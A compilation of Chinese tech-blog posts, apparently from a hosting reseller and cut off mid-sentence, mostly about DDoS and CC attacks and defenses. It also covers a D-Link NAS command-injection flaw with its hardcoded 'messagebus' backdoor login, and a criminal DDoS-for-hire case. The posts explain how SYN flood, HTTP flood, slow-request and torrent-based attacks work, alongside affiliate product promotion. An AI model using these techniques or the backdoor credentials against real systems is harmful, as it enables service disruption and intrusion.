要求立即删除搬运项目和用户,并得到了社区成员回复。 对于开发者们的删除要求,名为 XXM 的 GitCode 官方社区成员昨日在 Issue 中表达了歉意,并很直接地表示按照要求删除了项目和组织。然而,开发者发现还是能搜索到该组织,质疑只是进行了暂时屏蔽。 而在后续的 Issue 回应中,XXM 表示可以直接删除项目和组织,但个人账号需要开发者自行注销,并称“内部在进行紧急整改”。 看来CSDN在程序员印象不是很好哦,开发者宁愿要求删除项目,也不愿把项目放GitCode。 #### curl -v -i 域名:详解HTTPS握手、状态码、响应头诊断网站 curl -i -v https://域名 是看什么的? 这个命令是一个功能强大的网站/HTTP(S)服务诊断工具,主要用于在命令行下详细检查目标网站或服务的 HTTP(S) 响应和连接过程。具体来说,它查看: -i (--include): 在输出中包含 HTTP 响应头。 你会看到服务器返回的状态码(如 200 OK, 301 Moved Permanently, 404 Not Found, 500 Internal Server Error 等)以及各种重要的响应头信息,例如: Content-Type: 返回内容的类型(如 text/html, application/json)。 Content-Length: 返回内容的大小。 Location: 重定向的目标URL(常见于 301, 302 状态码)。 Set-Cookie: 服务器设置的Cookie。 Cache-Control, Expires: 缓存控制信息。 Server: 服务器软件信息(如 Nginx, Apache)。 Date: 响应时间。 Connection: 连接状态。 ...以及其他自定义或标准响应头。 -v (--verbose): 提供极其详细的过程输出。 这会显示整个请求和响应的完整交互过程,包括: TCP 连接建立过程(连接到哪个IP和端口)。 TLS/SSL 握手过程(如果使用HTTPS): 使用的协议版本(TLS 1.2, TLS 1.3)。 服务器证书信息(颁发者、有效期、域名是否匹配等)。 协商的加密套件。 完整的 HTTP 请求头(包括你发送的 Host, User-Agent, Accept 等)。 完整的 HTTP 响应头(与 -i 包含的相同,但 -v 本身也会输出)。 响应正文(HTML, JSON 等)。 连接关闭信息。 如果发生重定向,-v 会详细显示每一次重定向请求和响应的全过程。 总结来说,执行 curl -i -v https://域名 主要目的是: 诊断网站访问问题: 快速查看服务器返回的状态码和错误信息,定位是客户端错误(4xx)、服务器错误(5xx)还是重定向(3xx)。 检查响应头信息: 了解服务器设置(内容类型、缓存策略、Cookie、安全策略如CSP/HSTS等)。 分析重定向链: 清晰地看到请求被重定向了多次的完整路径。 验证 HTTPS/TLS 连接: 检查证书是否有效、是否过期、域名是否匹配、使用的协议和加密套件是否安全。 调试 API 接口: 查看API返回的原始响应头和状态码。 查看服务器信息: 了解网站使用的服务器软件。 #### CVE 项目资金告急 影响全球网络安全 MITRE 副总裁 Yosry Barsoum 4 月 16 日 警告称,美国政府不再为“通用漏洞披露”(CVE)和“通用弱点枚举”(CWE)项目提供资金支持,可能引发全球网络安全行业的广泛混乱。 CVE 项目由美国国土安全部(DHS)国家网络安全部门资助,是全球网络安全领域的核心标准。该项目通过 CVE 标识符(CVE IDs)追踪新发现的漏洞,确保漏洞讨论的准确性和一致性。 Barsoum 指出,服务中断将导致国家漏洞数据库和安全公告恶化,影响工具供应商、事件响应操作及各类关键基础设施。 CVE 不仅是漏洞管理系统的核心,还通过全球 CVE 编号机构(CNAs)分配 CVE IDs,帮助安全团队共享信息,避免因同一漏洞使用多重命名而引发的混乱,为安全公告、漏洞数据库等资源提供了统一参考标准。 若资金链断裂,CVE 系统的崩溃将摧毁最受信赖的安全工具和流程。前 CISA 负责人 Jean Easterly 在 LinkedIn 上警告,CVE 虽不常上头条,但却是现代网络安全最重要的支柱之一,失去它如同“同时拆除所有图书馆的卡片目录”,防御者将陷入混乱,攻击者则有机可乘。她强调,网络威胁无国界,CVE 是全球共享情报和协调行动的通用语言,失去它等于“所有人都在盲飞”。 为了应对危机,由长期担任 CVE 董事会成员的联盟宣布成立 CVE 基金会,这是一个致力于确保漏洞识别系统持续运行的非营利组织。 #### D-Link NAS 设备被曝高危安全漏洞 事件概述 近期,多款已停止支持的D-Link网络附加存储(NAS)设备被曝出存在严重的安全漏洞。这个漏洞的追踪编号为CVE-2024-3273,它主要涉及到通过“system”参数的命令注入问题,以及针对硬编码账户(用户名:“messagebus”和空密码)的后门,可以在设备上执行远程攻击命令。 影响设备 据研究,受影响的设备型号包括DNS-320L Version 1.11, Version 1.03.0904.2013, Version 1.01.0702.2013;DNS-325 Version 1.01;DNS-327L Version 1.09, Version 1.00.0409.2013;DNS-340L Version 1.08。 安全风险 这个漏洞可以让攻击者在系统上执行任意命令,可能导致未经授权访问敏感信息、修改系统配置或拒绝服务情况。 应对措施 由于这些设备已经达到了使用寿命(EOL),不再处于支持状态,因此它们不具备自动在线更新功能,也无法像当前机型那样具有发送通知的客户扩展功能。D-Link建议使用这些设备的用户退役相关产品,并选择可以接收固件更新的相关新产品。 #### DataForSeoBot DataForSeoBot 是 DataForSEO 网站的蜘蛛爬虫,旨在向世界各地的 SEO 爱好者和专业人士提供高质量的数据。以下是对它的详细介绍: 功能特点:主要用于构建和维护反向链接数据库。它会不断地在网络上爬行,抓取网站页面,将发现的链接添加到其反向链接数据库中,并对已包含的链接进行检查,以确保数据的准确性和时效性。 对网站的影响:DataForSeoBot 属于 “好” 的爬虫类别,支持网站的 robots.txt 设置,会明确标识自己的身份。正常情况下,它不会对网站造成伤害,不会收集除链接之外的其他数据,也不会触发广告或在网站流量统计中增加虚假数据。不过,有站长反映该爬虫存在不遵守 robots.txt 协议的情况,可能会对服务器资源造成较大消耗。 访问控制:网站所有者可以通过 robots.txt 文件对 DataForSeoBot 的爬行行为进行控制,例如修改其访问网站的默认频率,或者阻止它访问某些特定的页面或文件夹。 DataForSeoBot 的用户代理字符串为 “Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo - bot)”。它依靠多个子网来收集反向链接数据,网站所有者可以通过这些子网的 IP 地址来识别 DataForSeoBot。 #### DDoS CC攻击 漏洞入侵 详细介绍 DDoS(分布式拒绝服务)和CC(挑战碰撞)攻击通常被认为是网络攻击中的“明”手段,因为它们直接对目标系统发起攻击,意图使服务不可用,其行为通常是明显且容易察觉的。而漏洞入侵则更像是“暗”中的攻击,因为它涉及到利用系统或软件中的安全漏洞,悄无声息地渗透进目标系统。 DDoS攻击 DDoS攻击的目的是使目标服务器因大量的请求而无法处理,导致正常用户无法访问服务。这种攻击方式包括: SYN Flood:发送大量未完成的TCP连接请求。 UDP Flood:发送大量UDP数据包,耗尽网络带宽。 ICMP Flood:发送大量ICMP数据包,阻塞网络。 CC攻击 CC攻击(Challenge Collisions)是一种针对Web应用的DDoS攻击,它通过模拟多个正常用户不停地访问如论坛、留言板等Web页面,造成服务器资源耗尽,无法处理新的请求。 DDOS攻击和CC攻击的特点 直接性:攻击者直接对目标系统发起攻击,意图明显。 猛烈性:攻击流量巨大,迅速消耗目标系统的资源。 难以防御:需要高性能的硬件和专业的防御策略。 影响 服务中断:正常用户无法访问目标网站或服务。 经济损失:企业可能因服务中断而遭受重大经济损失。 信誉受损:长期的服务不可用可能导致用户流失。 漏洞入侵 与DDoS和CC攻击相比,漏洞入侵是一种更为隐蔽的攻击手段,它包括: SQL注入:利用数据库查询的漏洞,执行恶意SQL命令。 跨站脚本攻击(XSS):在网页中注入恶意脚本,影响其他用户。 远程命令执行:利用服务器软件的漏洞,远程执行命令。 未授权访问:利用配置不当或弱密码等漏洞,获取未授权的访问权限。 特点 隐蔽性:攻击行为不易被立即发现。 多样性:利用不同类型的漏洞进行攻击。 深度影响:可能对系统造成长期且深远的影响。 影响 数据泄露:敏感信息可能被窃取或滥用。 系统控制:攻击者可能完全控制受影响的系统。 长期损害:漏洞可能长时间未被发现,造成持续损害。 应对策略:构建网络安全的防线 面对DDoS、CC攻击和漏洞入侵的双重威胁,构建坚固的网络安全防线至关重要。 及时更新与打补丁:保持系统和软件的最新状态,及时修复安全漏洞。 强化访问控制:实施强密码策略和最小权限原则。 数据加密:对敏感数据进行加密处理,保护数据安全。 部署WEB应用防火墙:集成了WAF、DDoS、CC防护能力,可有效解决DDoS、CC攻击和漏洞入侵。 我们推荐使用百度云防护进行安全防御,百度云防护是百度旗下智能云提供的一种安全加速服务,通过智能DNS解析和动静态内容缓存技术,帮助用户提升业务的访问速度和用户体验。百度云防护集成了WAF、DDoS、CC防护能力,解决SQL 注入、XSS 跨站、Webshell 上传、非授权访问等多种 Web 服务攻击防护,有效解决 SYN Flood/ACK Flood/ICMP Flood/UDP Flood 等多种网络层 DDoS 攻击,以及 CC 攻击等应用层攻击,具备最高 T 级的 DDoS 防护能力。 #### ddos 可以d 可以c l4 l7 是什么意思 DDoS(分布式拒绝服务攻击,Distributed Denial of Service)中的D是分布式,DOS是拒绝服务的缩写。 DDoS攻击是一种通过N多个计算机/服务器,向目标发动DOS攻击。 L3-4层协议攻击通常代指DDoS攻击,简称DD,这是一种以服务器为目标的攻击模式。主要通过服务器IP进行攻击,过大的UDP或TCP流量包导致服务器直接卡死、宕机、或IP被机房“黑洞”,从而导致服务器失去相应与在线业务能力。 L7层协议攻击通常代指CC攻击,简称CC,这是一种以网站域名(URL网址)为目标的攻击模式,主要体现利用脚本或肉鸡,对目标站点进行大批量超常规的高并发请求。主要体现网站突然卡顿、宽带负载超标、CPU、内存等持续跑满,网站页面内资源响应超时或其他相关异常。 因此,根据上述内容,我们理解为:DDOS可以攻击L4层协议,也可以CC攻击L7层协议。 遇到DDoS攻击,可以使用高防服务器、高防IP和高防CDN来防御。 高防服务器 高防服务器主要是比普通服务器多了防御服务,一般都是在机房出口架设了专门的硬件防火墙设备以及流量清洗牵引设备等,用来防御常见的CC攻击,DDOS,SYN攻击。根据各个IDC机房的环境不同,有的提供有硬件防火墙,有使用软件防火墙。软件防火墙是寄生于操作平台上的,是通过软件去实现隔离内部网与外部网之间的一种保护屏障。硬件防火墙是镶嵌系统内的,硬件防火墙是有软件和硬件结合而生成的,硬件防火墙从性能方面和防御方面都要比软件防火墙要好。简单来说,就是能够帮助网站拒绝服务攻击,并且定时扫描现有的网络主节点,查找可能存在的安全漏洞的服务器类型,包括WAF(Web Application Firewall)防御,都可定义为高防服务器。 高防服务器推荐:https://www.suduwangluo.com/bms/custom-purchase.html 高防IP 高防IP是一种ddos攻击防护及流量转发服务。通过DNS解析将大规模攻击流量调度至高防IP,经过高防集群清洗中心过滤,将正常访问流量转发到业务源站。 高防IP推荐:高防IP介绍及配置流程 (zhujib.com) 高防CDN 高防CDN防御DDOS攻击的方法:1、高防CDN可以通过智能化系统判断不同访问用户的来源,让访问者连接到相应的服务器,减少服务器的压力;2、高防CDN能实现节点分配,分散攻击流量,让节点能顺利承受DDOS攻击;3、高防CDN能隐藏网站源IP,提供DDOS清洗和CC防御能力。 高防CDN推荐:https://zhujib.com/jdxingdun.html 总的来说,高防服务器、高防IP、高防CDN都是通过不同的方式来防御DDOS攻击,他们各自的工作原理和优势有所不同,但最终的目标都是为了保护网站免受DDOS攻击的侵害。 #### DDOS 攻击的防范教程 一个多月前,我的个人网站遭受 DDOS 攻击,下线了50多个小时。这篇文章就来谈谈,如何应对这种攻击。 需要说明的是,我对 DDOS 并不精通,从没想过自己会成为攻击目标。攻击发生以后,很多素昧平生的朋友提供了各种帮助和建议,让我学到了很多东西。这里记录的就是对我最有帮助的一些解决方案。 一、DDOS 是什么? 首先,我来解释一下,DDOS 是什么。 举例来说,我开了一家餐厅,正常情况下,最多可以容纳30个人同时进餐。你直接走进餐厅,找一张桌子坐下点餐,马上就可以吃到东西。 很不幸,我得罪了一个流氓。他派出300个人同时涌进餐厅。这些人看上去跟正常的顾客一样,每个都说"赶快上餐"。但是,餐厅的容量只有30个人,根本不可能同时满足这么多的点餐需求,加上他们把门口都堵死了,里三层外三层,正常用餐的客人根本进不来,实际上就把餐厅瘫痪了。 这就是 DDOS 攻击,它在短时间内发起大量请求,耗尽服务器的资源,无法响应正常的访问,造成网站实质下线。 DDOS 里面的 DOS 是 denial of service(停止服务)的缩写,表示这种攻击的目的,就是使得服务中断。最前面的那个 D 是 distributed (分布式),表示攻击不是来自一个地方,而是来自四面八方,因此更难防。你关了前门,他从后门进来;你关了后门,他从窗口跳起来。 二、DDOS 的种类 DDOS 不是一种攻击,而是一大类攻击的总称。它有几十种类型,新的攻击方法还在不断发明出来。网站运行的各个环节,都可以是攻击目标。只要把一个环节攻破,使得整个流程跑不起来,就达到了瘫痪服务的目的。 其中,比较常见的一种攻击是 cc 攻击。它就是简单粗暴地送来大量正常的请求,超出服务器的最大承受量,导致宕机。我遭遇的就是 cc 攻击,最多的时候全世界大概20多个 IP 地址轮流发出请求,每个地址的请求量在每秒200次左右。我看访问日志的时候,就觉得那些请求像洪水一样涌来,一眨眼就是一大堆,几分钟的时间,日志文件的体积就大了100MB。 本文以下的内容都是针对 cc 攻击。 三、HTTP 请求的拦截 如果恶意请求有特征,对付起来很简单:直接拦截它就行了。 HTTP 请求的特征一般有两种:IP 地址和 User Agent 字段。比如,恶意请求都是从某个 IP 段发出的,那么把这个 IP 段封掉就行了。或者,它们的 User Agent 字段有特征(包含某个特定的词语),那就把带有这个词语的请求拦截。 拦截可以在三个层次做。 (1)专用硬件 Web 服务器的前面可以架设硬件防火墙,专门过滤请求。这种效果最好,但是价格也最贵。 (2)本机防火墙 操作系统都带有软件防火墙,Linux 服务器一般使用 iptables。比如,拦截 IP 地址1.2.3.4的请求,可以执行下面的命令。 $ iptables -A INPUT -s 1.2.3.4 -j DROP iptables 比较复杂,我也不太会用。它对服务器性能有一定影响,也防不住大型攻击。 (3)Web 服务器 Web 服务器也可以过滤请求。拦截 IP 地址1.2.3.4,nginx 的写法如下。 location / { deny 1.2.3.4; } Apache 的写法是在.htaccess文件里面,加上下面一段。 <RequireAll> Require all granted Require not ip 1.2.3.4 </RequireAll> 如果想要更精确的控制(比如自动识别并拦截那些频繁请求的 IP 地址),就要用到 WAF。这里就不详细介绍了,nginx 这方面的设置可以参考这里和这里。 Web 服务器的拦截非常消耗性能,尤其是 Apache。稍微大一点的攻击,这种方法就没用了。 四、带宽扩容 上一节的 HTTP 拦截有一个前提,就是请求必须有特征。但是,真正的 DDOS 攻击是没有特征的,它的请求看上去跟正常请求一样,而且来自不同的 IP 地址,所以没法拦截。这就是为什么 DDOS 特别难防的原因。 当然,这样的 DDOS 攻击的成本不低,普通的网站不会有这种待遇。不过,真要遇到了该怎么办呢,有没有根本性的防范方法呢? 答案很简单,就是设法把这些请求都消化掉。30个人的餐厅来了300人,那就想办法把餐厅扩大(比如临时再租一个门面,并请一些厨师),让300个人都能坐下,那么就不影响正常的用户了。对于网站来说,就是在短时间内急剧扩容,提供几倍或几十倍的带宽,顶住大流量的请求。这就是为什么云服务商可以提供防护产品,因为他们有大量冗余带宽,可以用来消化 DDOS 攻击。 一个朋友传授了一个方法,给我留下深刻印象。某云服务商承诺,每个主机保 5G 流量以下的攻击,他们就一口气买了5个。网站架设在其中一个主机上面,但是不暴露给用户,其他主机都是镜像,用来面对用户,DNS 会把访问量均匀分配到这四台镜像服务器。一旦出现攻击,这种架构就可以防住 20G 的流量,如果有更大的攻击,那就买更多的临时主机,不断扩容镜像。 五、CDN CDN 指的是网站的静态内容分发到多个服务器,用户就近访问,提高速度。因此,CDN 也是带宽扩容的一种方法,可以用来防御 DDOS 攻击。 网站内容存放在源服务器,CDN 上面是内容的缓存。用户只允许访问 CDN,如果内容不在 CDN 上,CDN 再向源服务器发出请求。这样的话,只要 CDN 够大,就可以抵御很大的攻击。不过,这种方法有一个前提,网站的大部分内容必须可以静态缓存。对于动态内容为主的网站(比如论坛),就要想别的办法,尽量减少用户对动态数据的请求。 上一节提到的镜像服务器,本质就是自己搭建一个微型 CDN。各大云服务商提供的高防 IP,背后也是这样做的:网站域名指向高防 IP,它提供一个缓冲层,清洗流量,并对源服务器的内容进行缓存。 这里有一个关键点,一旦上了 CDN,千万不要泄露源服务器的 IP 地址,否则攻击者可以绕过 CDN 直接攻击源服务器,前面的努力都白费。搜一下"绕过 CDN 获取真实 IP 地址",你就会知道国内的黑产行业有多猖獗。 百度云加速是百度旗下的一款高防 CDN 产品,提供防火墙,可防DDOS/CC,高度推荐。 更新(6月27日) 攻击者看来订阅了我的微博。昨天这篇文章发布没多久,我就又遭受了攻击,他绕过CDN直接攻击源服务器(我不知道 IP 地址怎么泄漏的),流量还大过上一次。 感谢腾讯云的朋友,提供了一个高防 IP,使得网站可以重新上线。现在,我的防护措施是,源服务器前面有 CDN,如果攻击 CDN,影响不到源服务器。如果直接攻击源服务器的 IP 地址,我买了弹性 IP ,可以动态挂载主机实例,受到攻击就换一个地址。这只是一个技术博客,内容都是免费的,要防到这种地步,我也是无语了。 (完) #### DDoS 有哪些类型以及DDoS 的主要攻击方法 DDoS 攻击有 3 种类型: 基于容量的攻击,协议攻击应用层攻击。 以下是进行 DDoS 攻击的方法: UDP floodICMP (Ping) floodSYN floodPing of DeathSlowlorisNTP AmplificationHTTP flood #### DDOS/CC攻击能有多大? 众所周知,做网站很容易被攻击,人家看你赚钱了眼红就会攻击你,同行也会攻击你,尤其是做网赚行业的,经常被攻击,几乎每月都会有攻击,有同行的,也有勒索的。以七色光联盟为代表的黑客组织常年攻击网赚行业,而且攻击量巨大,普通站长根本无法防御这种级别的攻击,只能放弃网站,或者任由他攻击,佛系做站。 主机吧的一位客户这两个月就跟黑客杠上了,客户先是联系这边购买了200G的高防IP,起初防御还是可以的,黑客先是几十G的攻击,看见没有效果,然后慢慢加上去,直到加到超200G后,高防IP由于超限了被临时停了十几分钟,黑客看见有效果了,就一直持续攻击200G峰值左右,不多不少,导致客户网站出现持续访问不了情况。后来客户实在顶不住了,干脆升级400G! 而后又被攻击了几次,最高甚至高达330G峰值,高防IP都稳稳的防住了,往后的几天里,又攻击了几次,最高也在330G左右,由此主机吧推测,这黑客组织最高也只能打到330G的峰值了。 注意:这里是SYN攻击,这边高防IP是上层封UDP的,所以没打到,不过由于UDP是可以夸大流量的,所以推测如果UDP至少可以打到600G以上,这就很恐怖的数据了。 由于DDOS久攻不下,客户又改成了CC攻击。主机吧高防IP拦截最高达277025个IP 拦截数据包都是按亿来算的。 最后还是稳稳的防御下来了,可见这这高防IP还是很给力的,同时也说明这攻击量真的是大。不是一般高防产品可以防御的,连百度云加速都无法防御这么高的攻击,而需要购买高防包才可以防御。 最后如果您也要防御需求,可以联系主机吧咨询,我们会根据您的攻击情况推荐最性价比的防御产品给您,效果满意,可以试用。 #### ddos和cc攻击的区别是什么 如何做好防御 近几年,网络恶意攻击逐渐增多,很多网站饱受困扰,而其中最为常见的恶意攻击就是cc以及ddos攻击。对于一些防御能力较弱的网站来说,一旦遭遇这些攻击,轻则网站瘫痪,重则直接影响生存。那么ddos攻击和cc攻击区别在哪里?谁的威力比较大?下面主机吧来简单介绍一下。 DDOS和CC攻击的区别   dos攻击指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动攻击,从而成倍地提高拒绝服务攻击的威力。ddos的攻击方式有很多种,最基本的dos攻击就是利用合理的服务请求来占用过多的服务资源,从而使合法用户无法得到服务的响应。 CC攻击模拟多个用户(多少线程就是多少用户)不停的进行访问(访问那些需要大量数据操作,就是需要大量CPU时间的页面).这一点用一个一般的性能测试软件就可以做到大量模拟用户并发。CC攻击的原理就是攻击者控制某些主机不停地发大量数据包给对方服务器造成服务器资源耗尽,一直到宕机崩溃。 ddos攻击和cc攻击区别主要是针对对象的不同。DDoS是主要针对IP的攻击,而CC攻击的主要是网页。CC攻击相对来说,攻击的危害不是毁灭性的,但是持续时间长;而ddos攻击就是流量攻击,这种攻击的危害性较大,通过向目标服务器发送大量数据包,耗尽其带宽,甚至影响整个机房网络,所以一般的云服务商都是会设置有DDoS防御值,比如阿里云都是免费5G的防御值,超过了后会把IP拉入黑洞,由此可看DDoS的威力更大。 那么如何做好CC和DDoS的防御呢? 普通机房服务器想靠软件防御肯定不行的,因为不管理DDoS还是CC都对机房服务器网络配置都有一定要的要求。所以防御手段主要有三种:1.高防服务器 2.高防IP 3.高防CDN 其中高防服务器和高防IP价格相对较贵,主机吧推荐使用高防CDN,比如百度云加速高防CDN,价格既便宜,防御又好,还可以加速,还有清晰的报表显示,非常不错。 百度云加速提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。     #### ddos和CC攻击的区别是什么 如何防御 DDoS(分布式拒绝服务攻击)和CC(HTTP)攻击是两种不同类型的网络攻击,它们的主要区别在于攻击目标和攻击方式。 DDoS攻击是利用大量的计算机或网络设备发起协同攻击,以使目标系统无法正常工作。攻击者通常会使用大量的计算机或网络设备发送大量的请求,例如网络流量、数据包等,从而使目标系统无法处理来自正常用户的请求。DDoS攻击通常会持续一段时间,直到目标系统无法继续正常工作为止。 CC(HTTP)攻击是一种基于HTTP协议的攻击,主要是利用正常的HTTP请求发送大量的请求,从而使目标系统的网络带宽和处理能力过载。与DDoS攻击不同,CC攻击通常是通过一个或几个计算机发起的,因此攻击者需要使用一些技巧来尽可能地模拟正常的HTTP请求,从而使攻击更加难以检测。 以下是几种防御DDoS和CC攻击的方法: 使用DDoS和CC攻击防御工具。许多网络安全厂商都提供DDoS和CC攻击防御服务,可以使用这些服务来保护您的网络免受攻击。 确保您的网络和系统安全。保持您的网络和系统的安全更新,使用安全软件和防病毒软件来防御DDoS和CC攻击。 增加网络带宽和硬件资源。通过增加网络带宽和硬件资源来增加网络的处理能力,从而使网络更加能够承受DDoS和CC攻击。 配置安全策略。根据您的网络和应用程序的需求,设置合适的安全策略,例如访问控制、流量限制、防火墙等,以保护您的网络免受DDoS和CC攻击。 进行定期演练和培训。定期演练DDoS和CC攻击应急响应计划,以确保您的团队可以及时应对网络攻击。同时,定期培训您的员工,提高他们的网络安全意识和技能,以防范DDoS和CC攻击。 高防CDN推荐 百度云加速 百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。 优惠链接https://zhujib.com/yunjiasu.html 京东云星盾SCDN 京东云星盾SCDN安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 优惠链接:https://zhujib.com/jdxingdun.html #### ddos如何防御(有效防御DDOS的方法) 什么是DDOS? DDoS 就是分布式拒绝服务攻击,这种网络攻击形式尝试用恶意流量淹没网站或网络资源,从而导致网站或网络资源无法正常运行。 在分布式拒绝服务 (DDoS) 攻击中,攻击者发出海量实际上并不需要的互联网流量,耗尽目标的资源,造成正常流量无法到达预定目的地。 概括来说,DDoS 或 DoS 攻击就如同成百上千个虚假拼车请求所导致的意外交通堵塞。这些请求在拼车服务看来似乎合法,因此服务会调度驾驶员接人,从而不可避免地使城市街道拥堵。这会导致正常的合法流量无法到达目的地。 DDoS 和 DoS 攻击都会造成类似流量堵塞的效果 在 DDoS 攻击中,攻击者利用大量遭遇入侵的机器和接入互联网的设备向目标发送大量流量。这些设备有物联网 (IoT) 设备、智能手机、个人电脑和网络服务器等等。 针对一家公司的网站、Web 应用程序、API、网络或数据中心基础架构的发起的 DDoS 攻击会造成停机,导致合法用户无法购买产品、使用服务、获取信息或者进行其他正常访问。 ddos 如何防御? 如果是普通数据中心服务器需要提升服务器带宽以及安装专业的硬件防火墙设备进行流量清洗,而这个成本显然是相当高的。如今是云服务时代,显然不需要我们单独购买硬件防火墙的。 主机吧总结了目前云服务时代防御DDOS的有效方法有三个: 1.独立高防服务器 当普通数据中心不支持DDOS防御的时候,显然换高防机房是最好的选择,高防服务器是指运行在拥有专业硬件防火墙的服务器,可有效清洗DDOS攻击,一般独立防御的价格较高,最低的一千多一个月。 2.高防IP 跟高防服务器一样,是指高防数据中心分配的拥有清洗DDOS能力的IP,这个高防IP会把DDOS流量清洗掉,把清洁的流量转发至源服务器,可以省去我们更换服务器麻烦。价格也是比较贵,一般几千一个月。 3.高防CDN 高防CDN是目前最流行的方案,通过几十上百个全国各地拥有一定DDOS防御能力的高防IP节点进行转发,一但发现某个IP因DDOS攻击故障后,立即自动切换空闲高防节点,达到分散DDOS流量,抵御DDOS的目的。高防CDN是相对经济的防御模式,因为不需要每个节点都提供非常高的防御能力,只需要保证节点够多,切换够快就可以了。 目前国内高防CDN服务商主机吧推荐: 百度云加速 百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。 优惠链接https://zhujib.com/yunjiasu.html 京东云星盾SCDN 京东云星盾SCDN安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 优惠链接:https://zhujib.com/jdxingdun.html #### DDOS平台攻击支付宝,峰值累计 5.84T:判 11 个月 2020年9月,吴某某在深圳市龙岗区住处,花费价值33800元的比特币购买goeli***.cc和stres***.net两个攻击平台的服务,同时吴某某通过外网购买8台服务器,建立xd***.vip攻击平台,通过使用TG恶霸-XDDOS机器人下达攻击指令实施DDOS网络攻击,通过在Telegram自带聊天平台散发广告并联系客户。 犯罪嫌疑人赵某(另案处理)为其平台客服,负责联系客户和收款,犯罪嫌疑人吴xx、邓某(均另案处理)是吴某某下线,吴xx、邓某为吴某某发展客户,吴某某将部分TG恶霸-XDDOS机器人账号交给吴xx、邓某使用,俩人帮助客户实施网络攻击的收款汇入吴某某支付宝商用账号,吴某某给吴xx、邓某适当分成,通过其公司商户支付宝账号(chuangfu******@163.com)进行收款的,获利2万余元人民币。 经查,支付宝(中国)网络技术有限公司属下的蚂蚁金融公司,于2020年10月17日2时45分许至当日4时15分许,有24个IP遭受DDOS攻击,峰值累计5.84T,影响蚂蚁金融公司侧互联网网关服务入口的运行,攻击服务器所使用的IP地址归属深圳市龙岗区坂田街道。在本次攻击事件的防御中,其中3个香港IP的攻击流量超过IDC内部防护能力,调用了三次云堤海外黑洞服务,每次2000元,共计资损6000元。以上遭受攻击是吴某某等人的攻击平台所为。 另查,本案审理过程,被告人家属代其退赃人民币一万元。 法院裁决: 吴某某的行为构成破坏计算机信息系统罪。其具有认罪认罚、部分退赃从轻处罚情节。另吴某某系累犯,依法应从重处罚。公诉机关出具的量刑建议后,被告人进行了部分退赃,对该量刑建议本院予以调整。 判决根据《中华人民共和国刑法》第二百八十六条、第六十七条第三款、第六十四条、第六十五条。判决: 吴某某犯破坏计算机信息系统罪,判处有期徒刑十一个月。 #### DDoS攻击、CC攻击原理与防御方法 DDoS介绍 DDoS是英文Distributed Denial of Service的缩写,意即“分布式拒绝服务”,那么什么又是拒绝服务(Denial of Service)呢?可以这么理解,凡是能导致合法用户不能够访问正常网络服务的行为都算是拒绝服务攻击。也就是说拒绝服务攻击的目的非常明确,就是要阻止合法用户对正常网络资源的访问,从而达成攻击者不可告人的目的。分布式拒绝服务攻击一旦被实施,攻击网络包就会从很多DOS攻击源(俗称肉鸡)犹如洪水般涌向受害主机,从而把合法用户的网络包淹没,导致合法用户无法正常访问服务器的网络资源,因此,拒绝服务攻击又被称之为“洪水式攻击”,常见的DDOS攻击手段有SYN Flood、ACK Flood、UDP Flood、ICMP Flood、TCP Flood、Connections Flood、Script Flood、Proxy Flood等。 目前而言,黑客甚至对攻击进行明码标价,打1G的流量到一个网站一小时,只需50块钱。DDoS的成本如此之低,而且攻击了也没人管。   关于DDos攻击的常见方法 1. SYN Flood:利用TCP协议的原理,这种攻击方法是经典最有效的DDOS方法,可通杀各种系统的网络服务,主要是通过向受害主机发送大量伪造源IP和源端口的SYN或ACK 包,导致主机的缓存资源被耗尽或忙于发送回应包而造成拒绝服务。TCP通道在建立以前,需要三次握手: a. 客户端发送一个包含SYN标志的TCP报文, 同步报文指明客户端所需要的端口号和TCP连接的初始序列号 b. 服务器收到SYN报文之后,返回一个SYN+ ACK报文,表示客户端请求被接受,TCP初始序列号加1 c.客户端也返回一个确认报文ACK给服务器,同样TCP序列号加1 d. 如果服务器端没有收到客户端的确认报文ACK,则处于等待状态,将该客户IP加入等待队列,然后轮训发送SYN+ACK报文 所以攻击者可以通过伪造大量的TCP握手请求,耗尽服务器端的资源。 2. HTTP Flood:针对系统的每个Web页面,或者资源,或者Rest API,用大量肉鸡,发送大量http request。这种攻击主要是针对存在ASP、JSP、PHP、CGI等脚本程序,并调用MSSQLServer、MySQLServer、Oracle等数据库的网站系统而设计的,特征是和服务器建立正常的TCP连接,并不断的向脚本程序提交查询、列表等大量耗费数据库资源的调用,典型的以小博大的攻击方法。缺点是对付只有静态页面的网站效果会大打折扣。 3. 慢速攻击:Http协议中规定,HttpRequest以\r\n\r\n结尾来表示客户端发送结束。攻击者打开一个Http 1.1的连接,将Connection设置为Keep-Alive, 保持和服务器的TCP长连接。然后始终不发送\r\n\r\n, 每隔几分钟写入一些无意义的数据流, 拖死机器。 4. P2P攻击:每当网络上出现一个热门事件,比如XX门, 精心制作一个种子, 里面包含正确的文件下载, 同时也包括攻击目标服务器的IP。这样,当很多人下载的时候, 会无意中发起对目标服务器的TCP连接。   DDOS攻击现象判定方法 1.SYN类攻击判断:A.CPU占用很高;B.网络连接状态:netstat 